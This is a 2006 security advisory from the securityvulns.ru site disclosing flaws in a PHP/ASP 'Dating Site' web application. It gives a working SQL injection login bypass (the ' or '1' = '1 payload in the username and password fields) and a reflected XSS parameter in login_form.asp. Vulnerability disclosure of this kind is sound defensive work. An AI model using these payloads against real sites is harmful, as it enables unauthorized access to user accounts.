Computer Security

Security Advisory: Dating Site [ login bypass & xss]
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA22925] EC-CUBE Unspecified Cross-Site Scripting Vulnerability

  mxBB calsnails module 1.06 Remote File Inclusion Vulnerability

  Powie's PHP MatchMaker <= v4.05 (matchdetail)
Remote SQL Injection Exploit

  Powie's PHP Forum <= v1.29a (editpoll) Remote SQL Injection Exploit

From:laurent gaffié <saps.audit_(at)_gmail.com>
Date:18.11.2006
Subject:Dating Site [ login bypass & xss]

vendor site:http://www.hotwebapp.com/
product:Dating Site
bug:injection sql & xss
risk:high



log in with :
username = ' or '1' = '1
passwd = ' or '1' = '1

xss get :
/login_form.asp?msg=[xss here]




laurent gaffie & benjamin mosse
http://s-a-p.ca/
contact: saps.audit@gmail.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru